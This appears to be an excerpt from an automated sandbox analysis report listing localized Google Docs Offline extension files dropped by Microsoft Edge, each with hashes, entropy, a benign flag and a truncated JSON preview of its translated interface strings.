                                                                                                                                                                                                                                                                                                                  SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                                  MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                                  SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                                  SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                                  SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):3122
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                                  MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                                  SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                                  SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                                  SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1895
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                                  MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                                  SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                                  SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                                  SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1042
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                                  MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                                  SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                                  SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                                  SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2535
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                                  MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                                  SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                                  SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                                  SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1028
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                                  MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                                  SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                                  SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                                  SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):994
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                                  MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                                  SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                                  SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                                  SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2091
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                                  MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                                  SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                                  SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                                  SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2778
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                                  MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                                  SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                                  SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                                  SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1719
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                                  MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                                  SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                                  SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                                  SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):936
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                                  MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                                  SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                                  SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                                  SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):3830
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                                  MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                                  SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                                  SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                                  SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1898
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                                  MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                                  SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                                  SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                                  SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                                  MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                                  SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                                  SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                                  SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
